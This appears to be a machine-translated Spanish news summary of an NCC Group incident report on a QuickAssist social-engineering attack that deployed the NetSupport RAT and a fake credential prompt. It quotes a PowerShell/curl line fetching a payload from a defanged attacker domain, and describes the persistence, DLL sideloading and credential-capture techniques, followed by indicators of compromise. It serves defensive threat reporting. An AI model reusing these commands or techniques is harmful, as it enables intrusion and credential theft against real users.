Los actores de amenaza comprometieron con éxito sistemas corporativos en solo cinco minutos utilizando una combinación de tácticas de ingeniería social y ejecución rápida de PowerShell.
El incidente, investigado por el equipo de Forense y Respuesta a Incidentes (DFIR) de NCC Group (DFIR), demuestra cómo los ciberdelincuentes están armando aplicaciones comerciales de confianza para evitar las medidas de seguridad tradicionales.
Control de llave
1. Los piratas informáticos se hicieron pasar por soporte de TI para obtener acceso remoto de QuickAssist y lo comprometieron en menos de 5 minutos.
2. Rat Manager NetSupport implementada.
3. Herramientas legítimas armadas a través de la ingeniería social, que requiere una mejor capacitación de usuarios.
Ataque Quickassist: compromiso de 300 segundos
Los actores de amenaza ejecutaron una campaña cuidadosamente orquestada dirigida a aproximadamente veinte usuarios al hacerse pasar por el personal de soporte de TI.
Convencer con éxito a dos víctimas para otorgar acceso remoto, los atacantes explotaron la herramienta de soporte remoto nativo de Windows.
Dentro de los 300 segundos de obtener acceso, los adversarios desplegaron una serie de comandos de PowerShell que descargaron herramientas ofensivas y establecieron múltiples mecanismos de persistencia.
La secuencia de ataque comenzó con la manipulación del portapapeles usando el comando (curl hxxps: // resutato (.) Com/2-4.txt) .content | Set-clipboard, seguido de la ejecución de los scripts de PowerShell ofuscados, lee el informe.
La descarga de carga útil principal se produjo a través de una técnica esteganográfica sofisticada, donde el código malicioso se incrustó dentro de un archivo jpeg alojado en hxxps: // resutato (.) Com/b2/res/nh2.jpg.
El script empleó el descifrado de XOR con un marcador de 4 bytes (0x31, 0x67, 0xbe, 0xe1) para extraer y reconstruir un archivo ZIP que contiene componentes del administrador NetSupport, disfrazado de software “nethealth”.
Cosecha de credenciales
Los atacantes demostraron la artesanía avanzada al implementar múltiples mecanismos de persistencia.
Crearon tareas programadas configuradas para ejecutar cada cinco minutos utilizando regsvr32.exe con nombres de DLL aleatorios y persistencia del registro establecido a través de HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ nethealth.
El malware utilizó binarios legítimos como msiexec.exe y genup.exe para ataques de carga lateral DLL, implementando el componente de libcurl.dll troyanizado.
Quizás lo más preocupante fue el despliegue de una sofisticada GUI de recolección de credenciales que imitó las indicaciones de autenticación legítima del sistema.
La interfaz basada en PowerShell (c: \ users \ {username} \ videos \ l.ps1) creó una superposición de pantalla completa con un diálogo convincente de “verificación de credenciales del sistema”, capturando credenciales de texto sin formato a $ env: temp \ cred.txt.
La interfaz deshabilitó las funciones críticas de Windows, incluido el acceso a la barra de tareas y varios atajos de teclado, para evitar el escape del usuario.
La comunicación de comando y control se estableció con múltiples dominios, incluidos Resutato (.) Com y NimbusVaults (.) Com, que permite capacidades de gestión remota.
El éxito del ataque subraya la necesidad crítica de una capacitación mejorada en la conciencia del usuario y capacidades sólidas de respuesta a incidentes, ya que incluso las infracciones de seguridad breves pueden dar lugar a un compromiso organizacional significativo.
ValueTyPecomMentResutato (.) ComDomainCommand & Controlhxxps: // resutato (.) Com/b2/st/st (.) PhpurlCommand & Control + malware descargarhxxps: // resutato (.) Com/2-4.txturlmalware descargarhxxp: //196.251.69 (.) 195url Descargar196.251.69 (.) 195IP DirecciónMalware Descargar 4e57ae0cc388baffa98dd7555ac77ee3ca70f2eaasha1libcurl.dlldf3125365d72abf965368248295a53da1ccdceebsha1update.msmsm
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
.webp?w=1600&resize=1600,900&ssl=1){kind=link}